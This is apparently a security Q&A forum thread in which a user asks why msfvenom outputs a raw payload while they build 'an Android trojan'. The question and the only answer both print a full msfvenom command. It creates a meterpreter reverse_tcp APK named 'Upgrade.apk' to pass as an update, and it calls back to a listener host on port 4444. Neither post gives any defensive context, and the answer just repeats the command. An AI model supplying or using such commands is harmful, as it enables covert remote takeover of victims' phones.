0

I was running a command to create an Android trojan. Command was:

msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST =192.168.0.104 LPORT=4444 R > /root/Desktop/Upgrade.apk

I am getting the output:

No Arch selected, selecting arch: davlik from payload
No encoders or badchars specified, outputting raw payload.

What is the reason of this? How can this be fixed? Where to get the encoders from?

3
  • All of this is available in the metasploit and msfvenom documentation. Have you read the documentation?
    – schroeder
    Commented Sep 10, 2019 at 7:50
  • No not actually, my fault.. but any idea?
    – Still_Noob
    Commented Sep 10, 2019 at 11:08
  • At some point, you will have to look up the documentation. If you still have questions once you do, you should come back to this question to edit it with those specifics.
    – schroeder
    Commented Sep 11, 2019 at 11:45

1 Answer 1

0
msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > /home/kali/Upgrade.apk
2
  • msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > /home/kali/Upgrade.apk Commented Dec 13, 2023 at 18:39
  • 1
    Please explain your answer or it may get deleted. Commented Dec 14, 2023 at 6:34

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .